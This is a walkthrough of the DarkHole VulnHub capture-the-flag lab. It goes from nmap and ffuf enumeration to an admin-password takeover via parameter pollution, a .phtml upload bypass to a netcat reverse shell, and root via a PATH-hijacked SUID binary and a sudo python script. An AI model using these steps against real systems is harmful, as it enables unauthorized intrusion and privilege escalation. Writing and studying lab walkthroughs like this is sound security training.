DarkHole Vulnhub Walkthrough

Creator: Je_1r.
Download Link : https://www.vulnhub.com/entry/darkhole-1,724/


I started the enumeration with nmap scan to look for open ports and running services. You can also use rustscan for faster results using the command shown below.

nmap -p- -Pn
22/tcp open  ssh
80/tcp open  http

running nmap scripts to check for version of services and other useful information.

nmap -sC -sV -Pn -p22,80 -oN nmap.txt
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e4:50:d9:50:5d:91:30:50:e9:b5:7d:ca:b0:51:db:74 (RSA)
|   256 73:0c:76:86:60:63:06:00:21:c2:36:20:3b:99:c1:f7 (ECDSA)
|_  256 54:53:4c:3f:4f:3a:26:f6:02:aa:9a:24:ea:1b:92:8c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: DarkHole
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I first enumerated apache httpd server on port 80, but there was nothing useful on the main page. Next I used ffuf for directory brute-force attack using the command shown below:

ffuf -c -u "" -e .php,.txt,.html,.bak  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fc 404
index.php               [Status: 200, Size: 810, Words: 347, Lines: 29]
login.php               [Status: 200, Size: 2507, Words: 422, Lines: 50]
register.php            [Status: 200, Size: 2886, Words: 512, Lines: 56]
upload                  [Status: 301, Size: 317, Words: 20, Lines: 10]
css                     [Status: 301, Size: 314, Words: 20, Lines: 10]
js                      [Status: 301, Size: 313, Words: 20, Lines: 10]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1]
config                  [Status: 301, Size: 317, Words: 20, Lines: 10]
dashboard.php           [Status: 200, Size: 21, Words: 4, Lines: 1]

I found nothing useful in directories but login.php and register.php seemed to be interesting where I tested for SQL injection to bypass login form but the sql injection payloads didn't work.

After successful registration, I logged in and found a web page where users can update their information.

The get parameter id looked suspicious to me, so I decided to capture the request and play with this parameter in burpsuite (a more handy way). I first tested for IDOR but it did not work.

Next I intercepted the request while changing the password.

Now this time I tested for a parameter pollution attack and the response to this was "200 OK", which means the password changed successfully but for which user ? User with id 1 or with id 2?

I tried to login using my old password and I was able to log in. This means that the password was changed for the user with id 1 (maybe admin is the username).

I tried logging in as user admin with the password I updated and we were in!

File Upload Bypass

Now we have access to the admin panel and we have upload functionality. So I tried uploading a file with .php extension but only .png, .jpg and .gif files were allowed.

To bypass this server side check I simply renamed the shell.php script to shell.phtml and tried to upload the file again.

The file was uploaded successfully and was moved to /upload/ directory. I started a netcat listener on the specified port in my machine and got a reverse shell.

❯ nc -nvlp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 33038
Linux darkhole 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 18:06:30 up 39 min,  0 users,  load average: 0.04, 0.06, 0.25
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

User Shell

I started enumerating the box and found an interesting SUID binary using the command shown below:

find / -perm -u=s -type f 2>/dev/null

After running the toto binary, I found that it is running the id command in the background by setting up the uid and gid for user john. To confirm this, I ran the  strings command on the toto binary.

www-data@darkhole:/home/john$ ./toto
uid=1001(john) gid=33(www-data) groups=33(www-data)
www-data@darkhole:/home/john$ strings toto | head

Next I opened this binary in ghidra and after analyzing I found that it is vulnerable to misconfigured path.

We can take advantage of this by creating our own evil version of id to get a shell as user john.

www-data@darkhole:/tmp$ cat id
www-data@darkhole:/tmp$ chmod 777 id
www-data@darkhole:/tmp$ export PATH=/tmp:$PATH
www-data@darkhole:/tmp$ /home/john/toto
john@darkhole:/tmp$ whoami

Root Shell

Getting a root was very simple. In john's home directory, I found a password file which contains the password of user john.

Next I ran sudo -l to check for sudo permissions and found this:

john@darkhole:/home/john$ cat password 
john@darkhole:/home/john$ sudo -l
[sudo] password for john: 
Matching Defaults entries for john on darkhole:
    env_reset, mail_badpass,

User john may run the following commands on darkhole:
    (root) /usr/bin/python3 /home/john/file.py

User john we can edit file.py, so by using os module in python I added the code to pop a shell as user root!

john@darkhole:/home/john$ cat file.py 

**import os


john@darkhole:/home/john$ sudo -u root /usr/bin/python3 /home/john/file.py
root@darkhole:/home/john# cd /root
root@darkhole:~# cat root.txt 

We are now root and also we have completed this challenge! For any queries you can PM me on discord - golith3r00t#1859.

NOTE: The awesome artwork used in this article was created by Alex Pista.